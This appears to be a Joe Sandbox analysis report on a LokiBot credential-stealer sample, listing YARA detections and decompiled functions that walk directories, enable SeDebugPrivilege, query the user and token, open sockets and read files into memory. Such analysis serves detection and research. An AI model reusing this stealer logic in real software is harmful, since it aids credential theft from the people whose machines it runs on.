Yara matches:	Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000000.359525035.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: unknown Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000000.00000002.368819944.0000000002984000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000000.359540512.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmp, Author: unknown Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: wi7zJOZT2r.exePID: 7088, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	31.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.5%
Total number of Nodes:	1831
Total number of Limit Nodes:	93

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				void* _t40;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t40 = E00405B6F(_t124, L"%s\\%s", _a4); // executed
								_t101 = _t40;
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}

0x00403d82
0x00403d88
0x00403d8c
0x00403d8d
0x00403d90
0x00403ea9
0x00403ea9
0x00403eb9
0x00403ebb
0x00403ec0
0x00403f95
0x00403f95
0x00000000
0x00403f95
0x00403ece
0x00403edb
0x00403edd
0x00403ee2
0x00403f8e
0x00403f8f
0x00000000
0x00403f94
0x00000000
0x00403ee8
0x00403ef8
0x00403f0a
0x00403f12
0x00403f18
0x00403f21
0x00403f26
0x00403f28
0x00403f2d
0x00000000
0x00000000
0x00403f33
0x00403f76
0x00403f7c
0x00000000
0x00403f83
0x00403f36
0x00403f3a
0x00000000
0x00403f40
0x00403f0c
0x00403f10
0x00000000
0x00000000
0x00000000
0x00403f41
0x00403f41
0x00403f4b
0x00403f58
0x00403f5c
0x00403f88
0x00000000
0x00403f8d
0x00403f60
0x00000000
0x00403f60
0x00403ef8
0x00403ee8
0x00403da3
0x00403da9
0x00403ea6
0x00403ea8
0x00000000
0x00403ea8
0x00403db7
0x00403dc4
0x00403dc6
0x00403dcb
0x00403e9d
0x00403e9e
0x00403ea4
0x00000000
0x00000000
0x00000000
0x00000000
0x00403dd1
0x00403dd1
0x00403dd8
0x00000000
0x00000000
0x00403de2
0x00403e12
0x00403e22
0x00403e30
0x00403e36
0x00403e3f
0x00403e44
0x00403e47
0x00403e4a
0x00403e4c
0x00000000
0x00000000
0x00403e63
0x00403e65
0x00403e6a
0x00403e6f
0x00403f64
0x00403f6a
0x00000000
0x00403f71
0x00000000
0x00403e6f
0x00403e26
0x00403e27
0x00403e2e
0x00000000
0x00000000
0x00000000
0x00403e2e
0x00403dea
0x00403df9
0x00000000
0x00000000
0x00403e01
0x00403e10
0x00000000
0x00000000
0x00000000
0x00403e75
0x00403e7f
0x00403e8c
0x00403e8e
0x00403e97
0x00000000

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

%s\*, xrefs: 00403D99
Windows, xrefs: 00403DEA
Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Uniqueness

Uniqueness Score: -1.00%

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}

0x00406512
0x00406514
0x00406522
0x00406524
0x00406530
0x00406534
0x0040653f
0x0040654e
0x00406552
0x0040655a
0x0040655f
0x0040656d
0x00406570
0x00406573
0x0040657a
0x00406589
0x0040658d
0x00406590
0x00406594
0x00000000
0x0040659a
0x004065a1

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}

0x00402b8c
0x00402b92
0x00402b96
0x00402b9e
0x00402ba3
0x00402baa

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}

0x00406077
0x00406082
0x00406085

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}

0x004061c3
0x004061cb
0x004061cd
0x004061d0
0x004061de
0x004061e0
0x004061e5
0x004061e9
0x004061eb
0x004061ed
0x004061f2
0x0040622a
0x00406230
0x00406235
0x00406239
0x0040623b
0x00406244
0x00406249
0x00406249
0x0040624c
0x00406253
0x00406256
0x00406258
0x00406261
0x00406266
0x00406266
0x00406270
0x00406273
0x00406276
0x0040627b
0x0040627e
0x0040628c
0x0040628e
0x00406290
0x00406295
0x0040629a
0x0040629e
0x004062a0
0x004062ac
0x004062af
0x004062b7
0x004062b9
0x004062c9
0x004062e0
0x004062e2
0x004062e4
0x004062f3
0x004062f3
0x004062e4
0x004062f8
0x004062fd
0x004062a0
0x004062fe
0x00406302
0x00406307
0x0040630c
0x0040630d
0x0040630f
0x00406312
0x00406317
0x00406318
0x0040631c
0x0040631e
0x00406321
0x00406326
0x00000000
0x00406327
0x004061f4
0x004061ff
0x00406208
0x00406218
0x0040621d
0x00406224
0x00406226
0x00406228
0x00000000
0x00000000
0x00000000
0x00406228
0x00406201
0x00000000

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

0x00404e1d
0x00404e26
0x00404e2a
0x00404e2f
0x00404e37
0x00404e3a
0x00404e45
0x00404e4f
0x00404e57
0x00404e61
0x00404e66
0x00404e68
0x00404e6c
0x00404e6e
0x00404e7a
0x00404e80
0x00404e84
0x00404e9f
0x00404ea7
0x00404eab
0x00404eb1
0x00404eb1
0x00404eb6
0x00404ebe
0x00404ecb
0x00000000
0x00404ec0
0x00404ec1
0x00404ec7
0x00404ec7
0x00404ecd
0x00000000
0x00404ece
0x00404ebe
0x00404e87
0x00404e90
0x00000000
0x00404e90
0x00000000

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}

0x004040c4
0x004040ce
0x004040d0
0x004040e8
0x004040ea
0x004040ec
0x004040f2
0x0040418d
0x00404190
0x00404184
0x00000000
0x00404184
0x004041a0
0x004041a5
0x004041a7
0x00000000
0x00000000
0x004041a9
0x004041b6
0x004041b8
0x004041be
0x004041cb
0x004041d0
0x004041d1
0x004041d3
0x004041d8
0x004041dc
0x00000000
0x004041e2
0x00404100
0x0040410c
0x00404111
0x0040417a
0x0040417a
0x00000000
0x0040411b
0x0040411b
0x00404120
0x00404122
0x00404122
0x0040412c
0x0040413a
0x0040413c
0x00404140
0x00000000
0x00404142
0x0040414a
0x00404155
0x0040415a
0x0040415e
0x00404168
0x00404174
0x00404176
0x00404176
0x0040417d
0x0040417e
0x00000000
0x00404183
0x00404140

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
